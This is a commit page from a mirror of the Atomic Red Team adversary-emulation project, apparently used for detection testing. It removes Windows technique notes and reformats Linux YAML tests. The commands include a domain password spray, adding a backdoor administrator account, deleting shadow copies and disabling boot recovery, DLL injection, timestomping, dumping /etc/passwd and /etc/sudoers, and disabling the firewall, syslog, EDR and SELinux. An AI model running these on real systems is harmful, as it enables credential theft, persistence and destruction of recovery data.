security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

clean up completed md

Browse Source
This commit is contained in:
caseysmithrc
2018-05-24 17:44:54 -06:00
parent eeec0bd062
commit 12ef382245
14 changed files with 19 additions and 290 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Credential_Access/Brute_Force.md
-16
View File
@@ -1,16 +0,0 @@
# Brute Force
MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
## net.exe
### Password Spray
net user /domain > DomainUsers.txt
echo "Password1" >> pass.txt
echo "1q2w3e4r" >> pass.txt
Execute:
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
Windows/Credential_Access/Create_Account.md
-35
View File
@@ -1,35 +0,0 @@
# Create Account
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
## Net.exe
Local user add:
Net user /add Trevor SmshBgr123
Add new user to localgroup:
net localgroup administrators Trevor /add
Domain add:
net user <username> \password \domain
Add user to Active Directory:
dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
# Powershell 5.1
The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
## Add User
New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr Description 'Pwnage account'
## Create a group
New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
Windows/Credential_Access/Credentials_in_Files.md
-12
View File
@@ -1,12 +0,0 @@
# Credentials in Files
MITRE ATT&CK Technique: [T1081](https://attack.mitre.org/wiki/Technique/T1081)
## Group Policy Preference
[Payload](Payloads/Get-GPPPassword.ps1)
[PowerSploit Source](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
Input:
Get-GPPPassword -Server EXAMPLE.COM
Windows/Credential_Access/Hooking.md
-12
View File
@@ -1,12 +0,0 @@
## Hooking
MITRE ATT&CK Technique: [T1179](https://attack.mitre.org/wiki/Technique/T1179)
### Sample Windows DLL Injection into PowerShell
mavinject $pid /INJECTRUNNING C:\Atomic\AtomicSSLHook.dll
## Test Script
[AtomicSSLHook.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AtomicSSLHook.dll)
Windows/Defense_Evasion/File_Deletion.md
-31
View File
@@ -1,31 +0,0 @@
# File Deletion
MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
## cmd
del /f filename
rmdir example
## PowerShell
Remove-Item path c:\testfolder recurse
## vssadmin
vssadmin.exe Delete Shadows /All /Quiet
## wmic
wmic shadowcopy delete
## bcdedit
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
## wbadmin
wbadmin delete catalog -quiet
Windows/Defense_Evasion/Hidden_Files_and_Directories.md
-18
View File
@@ -1,18 +0,0 @@
## Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
Input:
Hide a file:
attrib.exe +h filename.exe
Mark as hidden, system file and read only:
attrib.exe +h +s +r evil.dll
List hidden files:
dir /a
Windows/Defense_Evasion/Timestomp.md
-10
View File
@@ -1,10 +0,0 @@
# Timestomp
MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099)
## Timestomp with PowerShell
#### Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
echo "Atomic Test File" > test.txt
PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
Windows/Discovery/Account_Discovery.md
-85
View File
@@ -1,85 +0,0 @@
## Account Discovery
MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
## Test Script
[Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/Discovery.bat)
### Net.exe
Domain Group Enumeration:
net group "domain admins" /domain
Domain User Enumeration:
net user <username> /domain
Local Group Enumeration:
net localgroup "administrators"
Local User Enumeration:
net user
Input:
net use
Input:
net share
Input:
net view
Input:
net accounts
## wmic.exe
### Reconnaissance
Input:
wmic useraccount get /ALL
Input:
wmic useraccount list
Input:
wmic startup list brief
Input:
wmic share list
Input:
wmic service get name,displayname,pathname,startmode
Input:
wmic process list brief
Input:
wmic process get caption,executablepath,commandline
Input:
wmic qfe get description,installedOn /format:csv
Input:
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
Input:
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
Windows/Exfiltration/Data_Compressed.md
-11
View File
@@ -1,11 +0,0 @@
# File Deletion
MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002)
## PowerShell
powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip
## Rar
rar a -r exfilthis.rar *.docx
Windows/Persistence/Browser_Extensions.md
-24
View File
@@ -1,24 +0,0 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
Windows/Persistence/Component_Object_Model_Hijacking.md
-17
View File
@@ -1,17 +0,0 @@
# Component Object Model Hijacking
MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute.
#### The presence of objects within
HKEY_CURRENT_USER\Software\Classes\CLSID\
#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
## Test Script
[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts)
atomics/T1087/T1087.yaml
+8 -8
View File
@@ -1,7 +1,7 @@
---
attack_technique: t1087
attack_technique: T1087
display_name: Account Discovery
atomic_tests:
- name: List all accounts
description: |
@@ -14,7 +14,7 @@ atomic_tests:
description: Path where captured results will be placed
type: Path
default: ~/loot.txt
executor:
executor:
name: sh
command: |
cat /etc/passwd > #{output_file}
@@ -30,7 +30,7 @@ atomic_tests:
description: Path where captured results will be placed
type: Path
default: ~/loot.txt
executor:
executor:
name: sh
command: |
cat /etc/sudoers > #{output_file}
@@ -46,7 +46,7 @@ atomic_tests:
description: Path where captured results will be placed
type: Path
default: ~/loot.txt
executor:
executor:
name: sh
command: |
grep 'x:0:' /etc/passwd > #{output_file}
@@ -57,7 +57,7 @@ atomic_tests:
supported_platforms:
- linux
- macos
executor:
executor:
name: sh
command: |
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
@@ -67,13 +67,13 @@ atomic_tests:
xxx
supported_platforms:
- linux
- macos
- macos
args:
output_file:
description: Path where captured results will be placed
type: Path
default: ~/loot.txt
executor:
executor:
name: sh
command: |
lastlog > #{output_file}
atomics/T1089/T1089.yaml
+6 -6
View File
@@ -1,14 +1,14 @@
---
attack_technique: t1089
attack_technique: T1089
display_name: Disabling Security Tools
atomic_tests:
- name: Disable iptables firewall
description: |
Disables the iptables firewall
supported_platforms:
- linux
executor:
executor:
name: sh
command: |
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
@@ -27,7 +27,7 @@ atomic_tests:
Disables syslog collection
supported_platforms:
- linux
executor:
executor:
name: sh
command: |
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
@@ -44,7 +44,7 @@ atomic_tests:
Disable the Cb Response service
supported_platforms:
- linux
executor:
executor:
name: sh
command: |
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
@@ -61,7 +61,7 @@ atomic_tests:
Disables SELinux enforcement
supported_platforms:
- linux
executor:
executor:
name: sh
command: |
setenforce 0
atomics/T1099/T1099.yaml
+5 -5
View File
@@ -1,7 +1,7 @@
---
attack_technique: t1099
attack_technique: T1099
display_name: Timestomp
atomic_tests:
- name: Set a file's access timestamp
description: |
@@ -10,7 +10,7 @@ atomic_tests:
- linux
- macos
input_arguments:
target_filename:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
executor:
@@ -25,7 +25,7 @@ atomic_tests:
- linux
- macos
input_arguments:
target_filename:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
executor:
@@ -44,7 +44,7 @@ atomic_tests:
- linux
- macos
input_arguments:
target_filename:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
executor: